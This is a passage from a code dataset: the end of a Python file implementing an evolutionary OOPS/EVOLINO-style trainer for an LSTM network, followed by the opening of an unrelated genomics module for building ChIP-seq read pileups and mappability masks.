internal LSTM states, known as Constant Error Carousels or CECs for
short) provides a unique source of possible solutions by introspecting
the states of the Topology's CECs in solutions.
I implement a very simple form of backtracking. Whenever a solution
is recorded, so is the current state of CECs in the Topology,
essentially, the timestamp the solution was found.
I will call it as such.
NB: My search algorith is sterile right now it doesn't
actually move in time between searches effectively.
Might be faster to have less cross passes and rely more on the
affector.
I do four different search operations in an epoch:
1. evaluate all previous soltuions at current timestamp
2. generate a number of mutated weight vectors
3. test the vectors in (2) at current timestamp
4. test the vectors in (2) at timestamps of all previous solutions
I can describe these steps in humorous layman:
1. See what happens if ancient mutants were living now.
2. "Honey, I want some mutants! Bring forth the plutonium
and let's make some passionate glowing radioactive love."
3. "Honey, how well did our mutant kids do in the educatatron
today?"
4. "Honey get the time machine! I want to see how our precious
mutant kids do in the past."
So it can be gleaned the the search is going to check for new solutions
that might work better if they were done in the previous timestamps.
- First off the current timestamp is saved: TS_now
- search result initialized to Topology's current weighting,
timestamp (TS_now), and fitness level
- Each previous solution is tried at TS_now
- any better performing result replaces current search result
- generate some number mutants
- for each mutant
- test mutant at TS_now
- if better the current search result is replaced
- test mutant at all past timestamps (of previous solutions)
- any better-performing result replaces current search
result
After the above procedure the best search result is moved to the top
of the solution store and when the store is already at capcity the
worst (bottom) entry is first discarded to make room. The result
is also stored into the Topology's weights and CECs and the error
or fitness of the result is remembered for the next epoch. It is
possible all terms fail to find a better alternative and the result
will be that the Topology is unmodified (since the best found result
is initialized with the current Topology's state and fitness first).
Viola!
We have an OOPS/EVOLINO hybrid.
Some apporaches to evaluate each search term:
1 evaluate a training set (invert sign of error so that negative
inidicates higher error)
2 run a simulation that can yield a performance factor
3 if your net writes stories put em on a website and get
crowdsourced ratings. Speed things up a bit by using an
SVR to approximate ratings using regression (human crowd
sourcing greatly slows down the training process otherwise).
4 similar process to 3 if your net draws art, makes music, etc.
Note: It is possible to change fitness test regime if desired.
If the net is forgetting too soon it needs more nodes, better
connectivity, or an alternate topology. Try arranging with nodes in
hypercubes where nodes connect only to immediate neighbours in the
hypercube, input terminals, or output terminals; however, be certain
each node connects to its neighbours on all axes (in a cube each node
has 3 neighbours, 4 in a tesseract, 5 in a pentaract, etc.)
The hypercube formation forces the network to learn to cluster
information and flow it towards the outputs. BTW the number of CECs
in a hypercube Topology will be 2^N where N is the dimension of the
hypecube. To keep connectivity reasonable try only connecting
neighbouring LSTM gates, excepting the input terminals which should
connect to all gates of gates of all nodes connected to input
terminals. A similar crossing should exist on the output. Each
output terminal should get as input the outputs of all nodes that feed
an output terminal.
"""
def __init__(self,*args,**kwargs):
"""
Create the OOPS Trainer
NB: !!! Do not add or modify connections on the
Topology once a trainer is created for it !!!
The stored solutions list only weights and CEC states to
minimize storage, and the length and ordering of these lists
depends on the ordering found in net.connections and
net.nodeRefs when the Trainer was created.
Arguments:
Topology - The Topology for trainer to operate on
maxSolutions - Solution store maximum size (default 1000)
"""
self.maxSolutions=1000
if 'maxSolutions' in kwargs:
self.maxSolutions=kwargs['maxSolutions']
self.maxSolutions=max(1,self.maxSolutions)
# make list of mutation operator references
self.mutationOps=[getattr(self,'mutate%s'%i) for i in [
'Splice','Radical','Sign','Swap','Transpose','Tumor']]
self.net=None
if 'Topology' in kwargs:
self.net=kwargs['Topology']
if self.net is None:
raise TypeError("OOPS: No network specified.")
# randomize initial weights
for c in self.net.connections:
self.net.connections[c]=EntropySource.uniform(-.1,1)
for n in self.net.nodeRefs:
n.CEC=EntropySource.uniform(-.1,.1)
n.output=0.0
"""
arguments to evaluator:
topology: the network's Topology object
returns:
resulting rank of solution
NB: network state will be configured for the
candidate and timestamp (CEC state), and thus
completely ready to test, when called
"""
self.solutions=[]
self.evalfunc=None
if 'Evaluator' in kwargs:
self.changeEvaluator(kwargs['Evaluator'])
if self.evalfunc is None:
raise TypeError("OOPS: No evaluator specified.")
"""
when net improves we remember which weights were changed
and the activity is weighted by the degree of change that
resulted. Whenever updated the vector is normalized
to have maximum activity 1.0
so genarlly whenever a weight participates in a better result
its activity increases by 1.0 however we will scale the change
by the net change in fitness from the previous best
also 1.0 assumes weights are always modified by a fixed constant
or not at all so I further scale by the distance of the change
made to the weight.
the noise inducers have a choice to either cause more noise
to affective "good" weights that have raised fitness or cause noise
on "bad" weights that have lowered fitness.
The affect will basically allow filtering modifications to allow
those that have the best history of improving fitness and attenuate
the ones that negated the fitness. It's a very poor man's analogue
to a kalman filter and as such uses no matrix math nor derivatives.
Again I want to avoid gradient based training since it has the
issue of local minima. I also want something adaptive (the fitness
function is ALLOWED to change). The ability of the fitness metric
to change is exactly why 50% of the search should be in "bad"
weightspace and 50% in known "good" weightspace.
We will do 50% of each
Ideally affect would be managed separate such that one affect vector
is tracker for every internal RNN state reached. This has intractable
storage requirements.
the affect is a global training aspect and should
be updated by all tests (every mutant uddates this metric)
we are trying to make the mutator smarter over time by coming up with
some data about where in the weightspace to do mutations
"""
self.resetAffect()
self.currentSolves=0
self.minFitness=float("inf")
self.maxFitness=float("-inf")
self.TrainingEpoch=self.TrainingEpoch_Backprop
def evaluator(self,net,**kwargs):
global visual,elapsed,since,framerate,font,textregion
for evt in pygame.event.get():
if evt.type == pygame.QUIT:
raise KeyboardInterrupt
now=pygame.time.get_ticks()
delta=now-since
elapsed+=delta
since=now
weightCount=len(self.net.connections)
newRk=self.evalfunc(net)
self.minFitness=min(self.minFitness,newRk)
self.maxFitness=max(self.maxFitness,newRk)
bgColor=(0,0,128)
divColor=(0,0,0)
if 'original' in kwargs and 'current' in kwargs and 'originalFitness' in kwargs:
org=kwargs['original']
cur=kwargs['current']
oldRk=kwargs['originalFitness']
self.updateAffect(org,cur,newRk-oldRk)
if elapsed>framerate:
while elapsed>framerate:
elapsed-=framerate
r=pygame.Rect(16,10,6*weightCount-1,211)
pygame.draw.rect(visual,bgColor,r)
for x in range(weightCount):
bar=100*self.weightAffect[x]
xbar=100-bar
#pygame.draw.line(visual,(255,0,0),(18+x*6,10), (18+x*6,10+xbar),5)
pygame.draw.line(visual,(0,255,0),(18+x*6,110),(18+x*6,110-bar),5)
prevBar=100*sigmoid(org[x])
xPrevBar=100-prevBar
curBar=100*sigmoid(cur[x])
xCurBar=100-curBar
pygame.draw.line(visual,bgColor,(16+x*6,120),(16+x*6,120+xPrevBar),2)
pygame.draw.line(visual,(255,0,255), (16+x*6,220),(16+x*6,220-prevBar),2)
pygame.draw.line(visual,bgColor,(19+x*6,120),(19+x*6,120+xCurBar),2)
pygame.draw.line(visual,(128,0,255), (19+x*6,220),(19+x*6,220-curBar),2)
if (x+1)<weightCount:
pygame.draw.line(visual,divColor,(21+x*6,10),(21+x*6,220),1)
nameImg=font.render(self.testId,True,(160,160,224))
pygame.draw.rect(visual,(0,0,0),textregion)
visual.blit(nameImg,(16,234))
pygame.display.flip()
return newRk
def resetAffect(self):
self.weightAffect=[1.0]*len(self.net.connections)
self.affectInit=True
def updateAffect(self,priorWts,currentWts,netFitness):
"""
Updates weight affects then renormalizes to [0,1]
where 0 is worst affect, 1 is best
"""
weightCount=len(priorWts)
self.affectInit=False
if len(priorWts)-len(currentWts)+len(self.weightAffect)-len(priorWts)!=0:
raise TypeErorr("updateActivity: Incompatible weightspaces (sizes differ).")
topChg=float("-Inf")
btmChg=float("Inf")
fScale=self.maxFitness-self.minFitness
if fScale==0.0:
fScale=float("Inf")
# noramlizes magnitude of modification
# 1.0=most, 0.0=least
for idx in range(weightCount):
magnitude=math.fabs(currentWts[idx]-priorWts[idx])
change=magnitude*(netFitness/fScale)
topChg=max(topChg,magnitude)
btmChg=min(btmChg,magnitude)
offset=btmChg
scale=topChg-btmChg
if scale==0.0:
# prevent dividum byzeroum
scale=float("Inf")
minAff=0
maxAff=0
for idx in range(weightCount):
magnitude=math.fabs(currentWts[idx]-priorWts[idx])
change=(magnitude/scale)*(netFitness/fScale)
affect=self.weightAffect[idx]+change
self.weightAffect[idx]=affect
minAff=min(minAff,affect)
maxAff=max(maxAff,affect)
offset=minAff
scale=maxAff-minAff
if scale==0.0:
# prevent dividum byzeroum
scale=float("Inf")
for idx in range(weightCount):
nAffect=(self.weightAffect[idx]-offset)/scale
self.weightAffect[idx]=nAffect
def changeEvaluator(self,testFunc):
self.evalfunc=testFunc
self.minFitness=float("Inf")
self.maxFitness=float("-Inf")
if self.solutions==[]:
save=self.saveSnapshot()
rank=self.evalfunc(self.net)
self.minFitness=min(self.minFitness,rank)
self.maxFitness=max(self.minFitness,rank)
log.log(log.last(),which='solveLog')
self.solutions=[(save,rank)]
self.rank=rank
self.loadSnapshot(save)
else:
save=self.saveSnapshot()
self.rank=self.evalfunc(self.net)
# to change evaluator we need to reevaluate solutions
# then resort them by descenidng fitness
#print("*** Trainer changed - reevaluating solutions")
for idx in range(len(self.solutions)):
((sW,sS),sR)=self.solutions[idx]
self.loadSnapshot((sW,sS))
sR=self.evalfunc(self.net)
#print(" %s" % log.last())
self.solutions[idx]=((sW,sS),sR)
self.minFitness=min(self.minFitness,sR)
self.maxFitness=max(self.minFitness,sR)
self.loadSnapshot(save)
# re-sort solutions by descending fitness of new evaluation regime
self.solutions=sorted(self.solutions,key=lambda s:s[1],reverse=True)
def TrainingEpoch_Backprop(self,**kwargs):
"""
Backpropogating trainer
with the ability to change fitness functions
comes an annoying problem... what is his
derivative?
solution:
treat the fitness as an inverted error!
an increase of fitness is a decrease of error
if we track the min and max fitness results we can
get a normalized error function
the best fitness encountered is a zero error
and the worst fitness encounted is an error of 1.0
this will be our "error delta"
once this is done we have the usual gradient descent
of an error square and his derivative
it should be understood that on the first pass we have
a problem becuase we don't have any range of the error
gradient as of yet. solution: do the activation
with temporarily noisified weights. this will yield
a different fitness factor that can be used to bootstrap
the estimator. the above process must repeat if the
fitness function is changed.
so we will not know in the trainer the exact output values
but we don't need that step... the normalized "error delta"
will substitute where we would normally have needed
expectedResult-actualResult
"""
((curWt,curSt),curRk)=self.solutions[0]
self.loadWeights(curWt)
self.loadState(curSt)
learnRate=0.0001
if 'learnRate' in kwargs:
learnRate=kwargs['learnRate']
# Not done yet
self.solutions[0]=((curWt,curSt),curRk)
def TrainingEpoch_Evolve(self):
sol=self.solutions[0]
#self.loadSnapshot(self.solutions[0][0])
self.loadWeights(self.solutions[0][0][0])
TS_now=self.saveState()
curTerm={'w':self.saveWeights(),'s':TS_now,'r':self.rank}
searchTerm={'w':self.saveWeights(),'s':TS_now,'r':self.rank}
# create some mutations
mutantCount=1000
# maximum random mutation operators per gene
mCount=len(self.solutions)+len(self.net.connections)
alternate=0
# will cylce good/bad affects
oscillateAlternate=1
if self.affectInit:
# if affect is in a reset state
# we don't want to oscillate
# since it means 50% of mutants
# won't be modified at all on first
# pass and thus wasted
oscillateAlternate=0
for mutantId in range(mutantCount):
self.testId="Mutant_%s" % (str(1000-mutantId).rjust(4,"0"))
# pick a random first parent
mutant=[]+self.solutions[
round((len(self.solutions)-1)*(1.0-math.cos(EntropySource.uniform(0.0,halfPi))))
][0][0]
#mutant=[]+self.solutions[0][0][0]
mutationCount=round(EntropySource.uniform(1,mCount))
# splice (mating to second random parent)
self.mutationOps[0](mutant)
egg=[]+mutant
# mutate mutant
"""
for mutations in range(mutationCount):
# apply randomly chosen mutation operator (other than splice)
op=round(EntropySource.uniform(1,len(self.mutationOps)-1))
self.mutationOps[op](mutant)
"""
for idx in range(len(mutant)):
new=EntropySource.uniform(-2,2)
org=mutant[idx]
aff=self.weightAffect[idx]**2.0
if (alternate==0):
# mutate "good" weights
# aff=0.0 is org, aff=1.0 is new
mutant[idx]=org*(1.0-aff)+new*aff
else:
# mutate "bad" weights
# aff=1.0 is org, aff=0.0 is new
mutant[idx]=org*aff+new*(1.0-aff)
"""
scribe=[]+egg
for idx in range(len(mutant)):
scribe[idx]=mutant[idx]
self.loadWeights(scribe)
scribe[idx]=egg[idx]
self.loadState(TS_now)
rk=self.evaluator(self.net,
original=searchTerm['w'],
current=scribe,
originalFitness=searchTerm['r'])
if rk>searchTerm['r']:
searchTerm['w']=[]+mutant
searchTerm['s']=TS_now
searchTerm['r']=rk
log.log(log.last(),which='solveLog')
self.solutions=[((searchTerm['w'],searchTerm['s']),searchTerm['r'])]+\
self.solutions[0:self.maxSolutions-1]
self.rank=rk
self.currentSolves+=1
"""
alternate=oscillateAlternate-alternate
# test at TS_now
self.loadWeights(mutant)
#self.loadState(TS_now)
rk=self.evaluator(self.net,
original=searchTerm['w'],
current=mutant,
originalFitness=searchTerm['r'])
if rk>searchTerm['r']:
searchTerm['w']=[]+mutant
searchTerm['s']=TS_now
searchTerm['r']=rk
log.log(log.last(),which='solveLog')
self.solutions=[((searchTerm['w'],searchTerm['s']),searchTerm['r'])]+\
self.solutions[0:self.maxSolutions-1]
self.rank=rk
self.currentSolves+=1
# if we found anything better store the best solution
if searchTerm['r']>curTerm['r']:
self.loadWeights(searchTerm['w'])
#self.loadState(searchTerm['s'])
self.rank=searchTerm['r']
def mutateTumor(self,chrom):
# similar to Radical but affects a
# randomly chosen section of the victim
p1=round(EntropySource.uniform(0,len(chrom)))
p2=p1
while p2==p1:
p2=round(EntropySource.uniform(0,len(chrom)))
lhs=min(p1,p2)
rhs=max(p1,p2)
ugly=[0.0]*(rhs-lhs)
for c in range(rhs-lhs):
radical=EntropySource.uniform(-6.0,6.0)
ugly[c]=radical
chrom[lhs:rhs]=ugly
def mutateRadical(self,chrom):
where=round(EntropySource.uniform(0,len(chrom)-1))
radical=EntropySource.uniform(-6.0,6.0)
chrom[where]=radical
return chrom
def mutateSign(self,chrom):
where=round(EntropySource.uniform(0,len(chrom)-1))
chrom[where]=-chrom[where]
return chrom
def mutateSplice(self,chrom):
nSol=len(self.solutions)
which=1.0-math.cos(EntropySource.uniform(0.0,halfPi))
which=round(which*float(nSol-1))
((other,sS),sR)=self.solutions[which]
picked=[False]*len(chrom)
for transcribe in range(int(len(chrom)/2)):
k=round(EntropySource.uniform(0,len(chrom)-1))
while picked[k]:
k=round(EntropySource.uniform(0,len(chrom)-1))
picked[k]=True
chrom[k]=other[k]
return chrom
def mutateSwap(self,chrom):
a=round(EntropySource.uniform(0,len(chrom)-1))
b=a
while b==a:
b=round(EntropySource.uniform(0,len(chrom)-1))
temp=chrom[a]
chrom[a]=chrom[b]
chrom[b]=temp
return chrom
def mutateTranspose(self,chrom):
a=round(EntropySource.uniform(0,len(chrom)-1))
b=(a+1) % len(chrom)
temp=chrom[a]
chrom[a]=chrom[b]
chrom[b]=temp
return chrom
def saveWeights(self):
return []+[self.net.connections[edge] for edge in sorted(self.net.connections)]
def saveState(self):
nodes=self.net.nodeRefs
return []+[n.CEC for n in nodes]+[n.states['output'] for n in nodes]
def saveSnapshot(self):
return (self.saveWeights(),self.saveState())
def loadWeights(self,Wts):
idx=0
for edge in self.net.connections:
self.net.connections[edge]=Wts[idx]
idx=idx+1
def loadState(self,innerState):
skip=int(len(innerState)/2)
idx=0
for n in self.net.nodeRefs.keys():
n.CEC=innerState[idx]
n.states['peephole']=sigmoid(n.CEC)
n.states['output']=innerState[idx+skip]
idx=idx+1
def loadSnapshot(self,snap):
Wts,CECs=snap
self.loadWeights(Wts)
self.loadState(CECs)
if __name__ == "__main__":
try:
from pprint import PrettyPrinter
fmt=PrettyPrinter(indent=2,width=40)
net=Topology()
inputs={}
outputs={}
node_labels="A,B,C,D"
connections=[
"AB","AC","AD",
"BA","BC","BD",
"CA","CB","CD",
"DA","DB","DC",
]
input_connections=[
"0A","0B","0C","0D",
"1A","1B","1C","1D",
"2A","2B","2C","2D"
]
output_connections=[
"D0"
]
nodes = { idx : LSTM_Node() for idx in node_labels}
nodenames={ nodes[k] : k for k in nodes }
for nm in nodes:
n=nodes[nm]
net.Connect((n,'peephole'),(n,'inputGate'))
net.Connect((n,'peephole'),(n,'forgetGate'))
net.Connect((n,'peephole'),(n,'outputGate'))
for c in connections:
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"input"))
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"inputGate"))
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"forgetGate"))
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"outputGate"))
for c in output_connections:
idx=int(c[1])
outputs[idx]=net.Connect((nodes[c[0]],"output"),None)
for c in input_connections:
idx=int(c[0])
dst=c[1]
if dst in ['0','1','2','3','4','5','6','7','8','9']:
net.Connect((inputs[idx],Input),(outputs[int(dst)],Output))
else:
if idx in inputs:
net.Connect((inputs[idx],Input),(nodes[dst],"input"))
else:
inputs[idx]=net.Connect(None,(nodes[dst],"input"))
"""
print("Inputs:")
fmt.pprint(inputs)
print("Outputs:")
fmt.pprint(outputs)
print("Nodes:")
fmt.pprint(nodes)
fmt.pprint(nodenames)
print("Connections:")
for c in net.connections.keys():
n1,c1=c[0]
n2,c2=c[1]
w=net.connections[c]
if n1 in nodenames.keys():
n1="Node "+nodenames[n1]
if n2 in nodenames.keys():
n2="Node "+nodenames[n2]
if c1==Input:
c1="*"
if c2==Output:
c2="*"
lhs="%s:%s" % (n1,c1)
rhs="%s:%s" % (n2,c2)
print("%s --> %s W=%s" % (lhs.rjust(15),rhs.ljust(15),w))
"""
def Tester(theNet,test=""):
global testlog
# learn test string
# the outputs scaled to range 0..255 and rounded to get ASCII
eTerms=0.0
inputs[0].write(0) # no input used for this test
prevTgt=0.0
prevOut=0.0
result=""
for c in test:
# second input is previous character
inputs[1].write(prevOut/255.0)
inputs[2].write(prevTgt/255.0)
theNet.Activate()
# compare output to expect and calculate error squares
o1=ord(c)
o2=round(outputs[0].read()*255.0)
prevOut=outputs[0].read()
# noramlize the ord to a fraction so that unrounded
# output may be used for error calculation
of1=float(o1)
prevTgt=of1/255.0
of2=outputs[0].read()*255.0
eTerms+=(of2-of1)*(of2-of1)
result=result+chr(o2)
eDist=math.sqrt(float(eTerms))
fitness=-eDist
log.log("'%s':'%s', fitness=%s" % (test,result,fitness))
# negate so higher error = lower fitness
return fitness
Trainer=OOPS(Topology=net,Evaluator=Tester)
test="Hello, World!"
#prefixes=[]
epoch=1
print("Goal sequence: %s" % test)
for pfx in range(len(test)):
#for pfx in [len(test)-1]:
subTest=partial(Tester,test=test[0:pfx+1])
Trainer.changeEvaluator(subTest)
while round(Trainer.solutions[0][1])<0:
solves=Trainer.currentSolves
Trainer.TrainingEpoch()
newSolves=Trainer.currentSolves-solves
lastSolve=log.last('solveLog')
if newSolves>0:
gotcha=["+","-"][round(Trainer.solutions[0][1])<0]
print("Epoch %s %s %s (%s solutions)" % (str(epoch).rjust(12,'0'),
gotcha,lastSolve,len(Trainer.solutions)))
epoch+=1
#prefixes.append(Trainer.solutions[0])
#Trainer.solutions=[]+prefixes
finally:
pygame.quit()
|
gau-veldt/LSTM_OOPS
|
lstm_oops.py
|
Python
|
gpl-3.0
| 46,930
|
[
"Brian"
] |
21cd21f5200ab2343257258410c6b85e46e8e7b43085c780ae43a78eb388f783
|
import sys
#sys.path.append('/home/dskola/workspace/expression_modeling/')
import matplotlib
#matplotlib.use('Agg')
import collections
import contextlib
import csv
import datetime
import math
import multiprocessing
import os
import re
import shutil
import subprocess
import gzip
import numpy
import scipy.ndimage
import scipy.signal
from model import pp_mappability
# import pp_mappability
from pgtools import toolbox
from model import motifs
from pgtools import myplots
from model import antfarm
from model import filterchains
THREADS = 31
MULTI_PROCESSING_METHOD = 'hybrid'
# print 'Using up to {} cores where possible'.format(THREADS)
try:
import mkl
except ImportError:
pass
else:
# print('MKL library found.')
mkl.set_num_threads(THREADS)
REPORTING_INTERVAL = 1000000
DEFAULT_CHROMOSOME_DIALECT = 'ucsc'
PILEUP_DTYPE = numpy.float16 # set to half-precision to conserve RAM
VERBOSE = True
NETWORK_TMP_DIR = toolbox.home_path('model_data/tmp')
# LOCAL_TMP_DIR = '/tmp/dskola'
# LOCAL_TMP_DIR = '/dev/shm'
LOCAL_TMP_DIR = NETWORK_TMP_DIR
CHAINFILE_BASEPATH = toolbox.home_path('model_data/chain_files')
INTERVAL_BASEPATH = toolbox.home_path('model_data/best_intervals')
PILEUP_DATA_FOLDER = toolbox.home_path('model_data/saved_pileups')
# LOCAL_TMP_DIR = NETWORK_TMP_DIR
FRAGMENT_SIZES_FILENAME = toolbox.home_path('model_data/fragment_sizes.tsv')
INTERVAL_FILE_TEMPLATE = '{}To{}.best.txt'
MAX_FILEHANDLES_PER_PILEUP = 100
# MAX_MESSAGE_SIZE = 268000000 # maximum number of vector elements that can be passed in a parameter tuple by multiprocessing.Pool
MAX_MESSAGE_SIZE = 10000000
WHITESPACE = re.compile(r'\s*')
def dbg_print(text, indent_level=0):
"""
Selective printer for status messages with optional indenting.
Will print message if global VERBOSE flag is true, and indents a number of tabs equal to <indent level>
:param text:
:param indent_level:
:return:
"""
if VERBOSE:
for line in text.split('\n'):
print(('\t' * indent_level + line))
def get_fragment_size_from_file(replicate_name):
# print('Checking for pre-computed fragment size for replicate {} ...'.format(replicate_name))
fragment_length = None
try:
with open(FRAGMENT_SIZES_FILENAME, 'rt') as fragment_size_file:
ss_reader = csv.reader(fragment_size_file, dialect=csv.excel_tab)
for line in ss_reader:
# print(line)
if line[0] == replicate_name:
fragment_length = int(line[1])
# print('Found pre-computed fragment size of {}'.format(fragment_length))
except IOError as ie:
print('No fragment size file found.')
else:
if fragment_length is None:
print('No pre-computed fragment size found .')
return fragment_length
def get_fragment_size_from_homer(homer_tag_directory):
homer_info = homer_parse_taginfo(os.path.join(homer_tag_directory, 'tagInfo.txt'))
fragment_length = homer_info['fragmentLengthEstimate']
return fragment_length
def save_fragment_length(replicate_name, fragment_length):
print('Saving fragment size to {}'.format(FRAGMENT_SIZES_FILENAME))
with open(FRAGMENT_SIZES_FILENAME, 'a') as fragment_size_file:
ss_writer = csv.writer(fragment_size_file, dialect=csv.excel_tab)
ss_writer.writerow([replicate_name, str(fragment_length)])
def get_chrom_length_dict(genome_table_fname, dest_chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT):
print('Getting chromosome lengths from {} and translating names to dialect {}'.format(genome_table_fname, dest_chromosome_dialect))
with open(genome_table_fname, 'rt') as gt_file:
length_dict = {}
for line in gt_file:
# print line
split_line = re.split(r'\s', line.strip())
if len(split_line) > 1:
# print split_line[0], toolbox.parse_chromosome_ID(split_line[0])
length_dict[toolbox.convert_chroms(split_line[0], dest=dest_chromosome_dialect)] = int(split_line[1])
# length_dict[split_line[0].strip()] = int(split_line[1])
return length_dict
def load_stranded(chrom_lengths, data_filename, name, build, fragment_sizes_filename=FRAGMENT_SIZES_FILENAME,
strand_shift=-1, reads_dialect=DEFAULT_CHROMOSOME_DIALECT):
"""
Wrapper function to load a pileup stranded object from a set of reads and perform a strand-shifted mixdown.
This is just a kludgy hack in place of refactoring the StrandedPileups and Pileups classes to something more
sensible.
:param chromosmes:
:param bed_filename:
:param name:
:param build:
:return:
"""
new_stranded = StrandedPileups(chrom_lengths=chrom_lengths, input_filename=data_filename, name=name, build=build,
chromosome_dialect=reads_dialect)
# check if pre-computed strand shift exists:
rep_path, rep_filename, rep_extension = toolbox.parse_path(data_filename)
if strand_shift == -1:
try:
with open(fragment_sizes_filename, 'rt') as ss_file:
ss_reader = csv.reader(ss_file, dialect=csv.excel_tab)
for line in ss_reader:
if line[0] == rep_filename:
strand_shift = int(line[1])
print(('Found pre-computed strand shift of {} for replicate {}'.format(strand_shift,
rep_filename)))
except IOError:
print('No strand shift file found.')
if strand_shift == -1:
print('No pre-computed strand shift found, computing now...')
strand_shift = new_stranded.estimateFragmentSize()
print('Saving strand shift to {}'.format(fragment_sizes_filename))
with open(fragment_sizes_filename, 'a') as ss_file:
ss_writer = csv.writer(ss_file, dialect=csv.excel_tab)
ss_writer.writerow([rep_filename, str(strand_shift)])
return new_stranded.mixDown(strand_shift)
def load_starts_only(chrom_lengths, input_filename, name, build, chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT):
"""
Wrapper function to load a pileup object from only the starts of reads (presumed fragment ends)
:param chromosmes:
:param bed_filename:
:param name:
:param build:
:return:
"""
print('Generating pileup vector from read starts in {}'.format(input_filename))
new_stranded = StrandedPileups(chrom_lengths=chrom_lengths, name=name, build=build,
chromosome_dialect=chromosome_dialect)
new_stranded.loadFromBed(input_filename=input_filename, region_handling='starts', ignore_strandless=False)
return new_stranded.mixDown()
def load_soft_masked(config, chrom_lengths, name, build, input_filename, ref_genome_path,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, validate=False):
"""
Convenience function that:
1. Generates a stranded pileup vector from a readset file using the fragment extension method
2. Generates a soft mask for the given fragment length from a file of alignable start sites for the given read length.
3. Applies the soft mask while mixing down the stranded pileup vector to a single strand
4. Generates a hard mask from regions in the soft mask that are zero on both strands, representing areas with no possible
fragment density.
5. Returns both the unstranded, soft-masked, fragment pileup vector and the hard mask.
Now, will look for a pre-saved pileup data folder in a subfolder of PILEUP_DATA_FOLDER having the name of the tagalign file.
:return:
"""
data_save_folder = os.path.join(PILEUP_DATA_FOLDER, toolbox.parse_path(input_filename)[1] + '_data')
toolbox.establish_path(PILEUP_DATA_FOLDER)
overall_load_start_time = datetime.datetime.now()
print('Looking for pre-generated data pileup in {}'.format(data_save_folder))
generate_data = False
try:
unstranded_chip = Pileups.load(data_save_folder, mmap_mode='')
except (IOError, OSError):
print('Pre-generated data not found. Will generate now.')
generate_data = True
else:
read_length = unstranded_chip.mode_read_length
if generate_data:
print()
print('Generating pileup vector from {} using fragment extension method'.format(input_filename))
chip_starts = StrandedPileups(chrom_lengths=chrom_lengths, name='{}_starts'.format(name),
build=config['GENOME_BUILD'],
chromosome_dialect=chromosome_dialect)
chip_starts.loadFromBed(input_filename=input_filename, region_handling='starts')
rep_path, rep_name, rep_extension = toolbox.parse_path(input_filename)
fragment_length = chip_starts.getFragmentSize(replicate_name=rep_name, save_plot_fname=os.path.join(rep_path,
'{}_fragment_size_cc'.format(
rep_name)))
print()
print('Extending data reads to fragments of size {} ...'.format(fragment_length))
stranded_chip = chip_starts.fragExtend(fragment_length)
read_length = chip_starts.mode_read_length # grab this number before we delete the whole thing
del chip_starts
soft_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER,
'{}_{}_soft_mask'.format(config['GENOME_BUILD'], read_length))
try:
print('Looking for pre-generated soft mask pileup in {}'.format(soft_mask_save_folder))
soft_mask=StrandedPileups.load(soft_mask_save_folder, mmap_mode='')
except (IOError, OSError) as ex:
print('Pre-generated soft mask not found. Generating . . .')
generate_soft_mask = True
else:
generate_soft_mask = False
if generate_soft_mask:
print()
print('Generating soft mask ...')
alignable_starts_filename = os.path.join(ref_genome_path,
'{}_start_regions_{}.bed'.format(config['GENOME_BUILD'], read_length))
if not os.path.isfile(alignable_starts_filename):
mappble_basepairs = pp_mappability.get_mappability(config, read_length, make_region_file=True)
soft_mask_starts = StrandedPileups(chrom_lengths=chrom_lengths,
name='{}_{}_soft_mask_starts'.format(config['GENOME_BUILD'], read_length),
build=config['GENOME_BUILD'],
chromosome_dialect=chromosome_dialect)
soft_mask_starts.loadFromBed(input_filename=alignable_starts_filename, ignore_strandless=True,
display_read_lengths=False)
soft_mask = soft_mask_starts.readStartsToSoftMask(read_length=read_length, fragment_length=fragment_length)
soft_mask.save(soft_mask_save_folder)
hard_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER,
'{}_{}_hard_mask'.format(config['GENOME_BUILD'], read_length))
try:
print('Looking for pre-generated hard mask pileup in {}'.format(hard_mask_save_folder))
hard_mask = Pileups.load(hard_mask_save_folder, mmap_mode='')
except (IOError, OSError) as ex:
print('Pre-generated hard mask not found. Generating . . .')
generate_hard_mask = True
else:
generate_hard_mask = False
if generate_hard_mask:
print()
print('Generating hard mask of unalignable regions ...')
hard_mask = soft_mask.mixDown().nonzero()
hard_mask.name = '{}_hard_mask'.format(read_length)
hard_mask.toType(numpy.bool)
hard_mask.save(hard_mask_save_folder)
if generate_data:
print()
stranded_chip.applySoftMask(soft_mask=soft_mask)
del soft_mask
print()
print('Mixing down stranded ChIP pileups to single-stranded...')
unstranded_chip = stranded_chip.mixDown()
del stranded_chip
unstranded_chip.toType(PILEUP_DTYPE)
print()
print('All done loading {} in {}'.format(unstranded_chip.name,
datetime.datetime.now() - overall_load_start_time))
unstranded_chip.save(data_save_folder)
if validate:
print('Validating...')
to_use = numpy.nonzero(hard_mask.flatten())[0]
min_chip = unstranded_chip.flatten()[to_use].min()
max_chip = unstranded_chip.flatten()[to_use].max()
print(('Min value: {}, max value: {}'.format(min_chip, max_chip)))
if max_chip > fragment_length * 2:
raise Exception(
'Invalid maximum pileup height {} in {}, should <= 2 * fragment size of {}'.format(max_chip,
unstranded_chip.name,
fragment_length))
print('Loaded successfully in {}.'.format(datetime.datetime.now() - overall_load_start_time))
return unstranded_chip, hard_mask
def homer_parse_taginfo(tag_info_filename):
"""
Extract information from HOMER's tagInfo.txt file in the tag directory.
Returns a dictionary consisting of the fields defined by the key-value pairs at the top of the file.
Note that the current format of the tagInfo file is a little wonky, seems to be a work in progress subject to
change down the road.
It's basically a 3-column TSV with the chromosome, unique positions, and total tags. But after the header,
and the global values, there's a set of lines with key-value pairs, then it gives the 3 columns for the
individual chromosomes.
Values useful for constructing a pileup: fragmentLengthEstimate, peakSizeEstimate, averageTagLength
"""
with open(tag_info_filename, 'rt') as tag_info_file:
info = {}
header = tag_info_file.readline()
assert header == 'name\tUnique Positions\tTotal Tags\n', 'Invalid header found: {}'.format(header)
global_values = tag_info_file.readline()
line = tag_info_file.readline()
# read the key value pairs
while '=' in line:
key, value = [x.strip() for x in line.strip().split('=')]
info[key] = toolbox.smart_convert(value)
line = tag_info_file.readline()
return info
def homer_get_mode_tag_length(tag_length_distribution_filename):
"""
